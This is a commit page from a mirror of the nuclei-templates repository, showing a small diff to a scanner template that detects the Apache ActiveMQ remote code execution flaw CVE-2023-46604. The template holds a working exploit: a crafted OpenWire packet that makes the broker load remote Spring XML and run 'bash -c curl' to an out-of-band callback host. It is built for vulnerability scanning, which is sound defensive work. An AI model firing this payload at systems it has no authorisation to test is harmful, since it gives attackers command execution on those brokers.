daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Updated CVE-2023-46604

patch-1
Prince Chaddha 2024-02-01 19:53:02 +05:30 committed by GitHub
parent 888c7c347f
commit 83c43a92b6
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 4 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

9
javascript/cves/2023/CVE-2023-46604.yaml
View File

@ -6,7 +6,7 @@ info:
severity: critical
description: |
Apache ActiveMQ is vulnerable to Remote Code Execution.The vulnerability may allow a remote attacker with network access to a broker to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause the broker to instantiate any class on the classpath.
Users are recommended to upgrade to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3, which fixes this issue.
Users are recommended to upgrade to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3, which fixes this issue.
reference:
- http://www.openwall.com/lists/oss-security/2023/10/27/5
- https://activemq.apache.org/security-advisories.data/CVE-2023-46604-announcement.txt
@ -40,20 +40,20 @@ javascript:
let b = m2.Buffer();
let name=Host+':'+Port;
let conn = m1.Open('tcp', name);
let oob='{{interactsh-url}}'
let randomvar = '{{randstr}}'
var Base64={encode: btoa}
exploit_xml='http://{{interactsh-url}}/b64_body:'+Base64.encode('<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation=" http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"> <bean id="pb" class="java.lang.ProcessBuilder"> <constructor-arg> <list value-type="java.lang.String"><value>bash</value><value>-c</value><value>curl http://$(echo '+randomvar+').'+oob+'</value> </list> </constructor-arg> <property name="whatever" value="#{ pb.start() }"/> </bean></beans>') +'/'
exploit_xml=`http://${oob}/b64_body:`+Base64.encode('<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation=" http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"> <bean id="pb" class="java.lang.ProcessBuilder"> <constructor-arg> <list value-type="java.lang.String"><value>bash</value><value>-c</value><value>curl http://$(echo '+randomvar+').'+oob+'</value> </list> </constructor-arg> <property name="whatever" value="#{ pb.start() }"/> </bean></beans>') +'/'
packet="00000001100000006401010100436f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e46696c6553797374656d586d6c4170706c69636174696f6e436f6e74657874010"
packet+=(exploit_xml.length).toString(16)
packet+=(b.WriteString(exploit_xml)).Hex()
conn.SendHex(packet);
resp = conn.RecvString()
randomvar
randomvar
args:
Host: "{{Host}}"
Port: "61616"
oob: "{{interactsh-url}}"
matchers:
- type: dsl
@ -61,4 +61,3 @@ javascript:
- 'contains(interactsh_protocol, "dns")'
- 'contains(interactsh_request, response)'
condition: and
# digest: 4a0a00473045022100d4c554500d405db9735009ee218f1ff67d0af36dcb75e873d482dc3c42c704a20220682e2c8b2df63a50123822153bfb3179130e204c10d0b8b45fc85eb98b458387:922c64590222798bb761d5b6d8e72950